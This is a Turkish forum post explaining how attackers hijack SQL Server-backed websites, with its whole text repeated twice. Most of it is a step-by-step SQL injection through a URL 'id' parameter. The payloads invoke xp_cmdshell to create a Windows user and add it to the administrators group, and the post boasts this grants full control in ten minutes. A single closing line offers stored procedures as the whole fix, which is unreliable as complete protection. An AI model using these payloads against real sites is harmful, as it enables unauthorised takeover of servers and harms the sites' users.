deltanyum
Banned
- Katılım
- 9 Tem 2005
- Mesajlar
- 219
- Reaction score
- 0
- Puanları
- 0
Dünya üzerinde sitelerin yaklaşık %80'i veritabanı kullanıyor.Fakat içindeki verilere veya sisteminin güvenliğine ne kadar önem veriyor?
(burası bi facia) 5 üzerinden not verirsek çoğu 2 alır tabi bu tedbirsizliğin sonucunda sistemlerinin kırılması ve o siteyi kullanan birçok kişinin madur olması an meselesidir.Şimdi hackerlar veritabanlarını nasıl kullanıyor ve database'i kullanarak sistemi nasıl ele geçiriyor onu anlatayım örneğin hacker sql injectionla hacklemek istediği bi sitenin ilk olarak veri girişlerini kontrol eder(üye girişi,arama,yeni üye vs.) eğerki bunlar kontrol edilmiş veya injectiona izin vermiyorsa farklı veri girişi yeri bulur ve en korunmasınızıda internet explorer'ın www.xxx.com/detay.aspx?id=1 yazan yeridir birçok insan buradan gelen veriyi direk alır ve işler işte burada hackerın yapması gereken tek şey ufak bi kodla sistemi le geçirmek bunu adım adım izleyelim
1=)www.viktim.com/xxx.aspx?id=1
2=)www.viktim.com?xxx.aspx?id=1 ' exec master..xp_cmdshell 'net user /ADD kullaniciadi parola(en az 8 haneli olmak zorunda)' --
3=)www.viktim.com?xxx.aspx?id=1 ' exec master..xp_cmdshell 'net localgroup administrators kullaniciadi' --
işte bu kadar siz artık o makinanın adminisiniz ne isterseniz yapabilirsiniz bunu yapmak en fazla 10 dk alır
peki nasıl sistemimizin güvenliğini sağlayabileceğiz sorusu ise çok basit eğer sql server veritabanı kullanıyorsanız yapmanız gereken tek şey
gelen tüm verileri stored procedure'e yollamak ve işlemlerinizi bu procedurede yapıp oradan istemcilere göstermek
bir dahaki makalemde görüşmek üzere güvenli günler ve ii çalışmalar
(burası bi facia) 5 üzerinden not verirsek çoğu 2 alır tabi bu tedbirsizliğin sonucunda sistemlerinin kırılması ve o siteyi kullanan birçok kişinin madur olması an meselesidir.Şimdi hackerlar veritabanlarını nasıl kullanıyor ve database'i kullanarak sistemi nasıl ele geçiriyor onu anlatayım örneğin hacker sql injectionla hacklemek istediği bi sitenin ilk olarak veri girişlerini kontrol eder(üye girişi,arama,yeni üye vs.) eğerki bunlar kontrol edilmiş veya injectiona izin vermiyorsa farklı veri girişi yeri bulur ve en korunmasınızıda internet explorer'ın www.xxx.com/detay.aspx?id=1 yazan yeridir birçok insan buradan gelen veriyi direk alır ve işler işte burada hackerın yapması gereken tek şey ufak bi kodla sistemi le geçirmek bunu adım adım izleyelim
1=)www.viktim.com/xxx.aspx?id=1
2=)www.viktim.com?xxx.aspx?id=1 ' exec master..xp_cmdshell 'net user /ADD kullaniciadi parola(en az 8 haneli olmak zorunda)' --
3=)www.viktim.com?xxx.aspx?id=1 ' exec master..xp_cmdshell 'net localgroup administrators kullaniciadi' --
işte bu kadar siz artık o makinanın adminisiniz ne isterseniz yapabilirsiniz bunu yapmak en fazla 10 dk alır
peki nasıl sistemimizin güvenliğini sağlayabileceğiz sorusu ise çok basit eğer sql server veritabanı kullanıyorsanız yapmanız gereken tek şey
gelen tüm verileri stored procedure'e yollamak ve işlemlerinizi bu procedurede yapıp oradan istemcilere göstermek
bir dahaki makalemde görüşmek üzere güvenli günler ve ii çalışmalar